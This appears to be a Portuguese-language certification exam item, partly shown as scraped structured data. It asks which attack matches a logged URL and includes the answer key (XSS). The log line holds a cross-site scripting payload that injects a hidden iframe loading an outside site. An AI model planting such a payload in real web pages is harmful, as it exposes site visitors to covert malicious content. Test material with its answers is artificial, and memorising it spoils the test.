Um exemplo da chamada comum para este registro seria: https://www.minhaaplicacao.com.br/atualizacao?mensagem=Aviso de nova publicaçãoIdentificou-se também que o campo mensagem é utilizado na composição do site e seu conteúdo aparece como parte do html dele.A seguinte opção é consistente com um ataque que geraria um log deste tipo:","text":"Durante uma análise de logs no Servidor B encontrou-se o seguinte registro: https://www.minhaaplicacao.com.br/atualizacao?mensagem=Um exemplo da chamada comum para este registro seria: https://www.minhaaplicacao.com.br/atualizacao?mensagem=Aviso de nova publicaçãoIdentificou-se também que o campo mensagem é utilizado na composição do site e seu conteúdo aparece como parte do html dele.A seguinte opção é consistente com um ataque que geraria um log deste tipo:","answerCount":5,"datePublished":"2023-01-01T00:00:00-03:00","author":{"@type":"Organization","name":"FGV","url":"https://questionei.com"},"suggestedAnswer":[{"@type":"Answer","text":"Distributed Denial of Service.","position":1,"encodingFormat":"text/html","upvoteCount":0,"datePublished":"2023-01-01T00:00:00-03:00","url":"https://questionei.com/questoes/457941204387774/#alternativa-0","author":{"url":"https://questionei.com","@type":"Organization","name":"FGV"}},{"@type":"Answer","text":"SQL Injection.","position":2,"encodingFormat":"text/html","upvoteCount":0,"datePublished":"2023-01-01T00:00:00-03:00","url":"https://questionei.com/questoes/457941204387774/#alternativa-1","author":{"url":"https://questionei.com","@type":"Organization","name":"FGV"}},{"@type":"Answer","text":"Cross-site Scripting ou XSS.","position":3,"encodingFormat":"text/html","upvoteCount":0,"datePublished":"2023-01-01T00:00:00-03:00","url":"https://questionei.com/questoes/457941204387774/#alternativa-2","author":{"url":"https://questionei.com","@type":"Organization","name":"FGV"}},{"@type":"Answer","text":"Man in the middle.","position":4,"encodingFormat":"text/html","upvoteCount":0,"datePublished":"2023-01-01T00:00:00-03:00","url":"https://questionei.com/questoes/457941204387774/#alternativa-3","author":{"url":"https://questionei.com","@type":"Organization","name":"FGV"}},{"@type":"Answer","text":"Phishing.","position":5,"encodingFormat":"text/html","upvoteCount":0,"datePublished":"2023-01-01T00:00:00-03:00","url":"https://questionei.com/questoes/457941204387774/#alternativa-4","author":{"url":"https://questionei.com","@type":"Organization","name":"FGV"}}],"acceptedAnswer":{"@type":"Answer","text":"Cross-site Scripting ou XSS.","encodingFormat":"text/html","datePublished":"2023-01-01T00:00:00-03:00","url":"https://questionei.com/questoes/457941204387774/#resposta-correta","author":{"url":"https://questionei.com","@type":"Organization","name":"FGV"}}}}
Durante uma análise de logs no Servidor B encontrou-se o seguinte registro: https://www.minhaaplicacao.com.br/atualizaca...
Durante uma análise de logs no Servidor B encontrou-se o seguinte registro: https://www.minhaaplicacao.com.br/atualizacao?mensagem=<script>document.write(“<iframe width=’0’ height=’0’ src=’https://ssite.cn’></iframe>”)</script>
Um exemplo da chamada comum para este registro seria: https://www.minhaaplicacao.com.br/atualizacao?mensagem=Aviso de nova publicação
Identificou-se também que o campo mensagem é utilizado na composição do site e seu conteúdo aparece como parte do html dele.
A seguinte opção é consistente com um ataque que geraria um log deste tipo: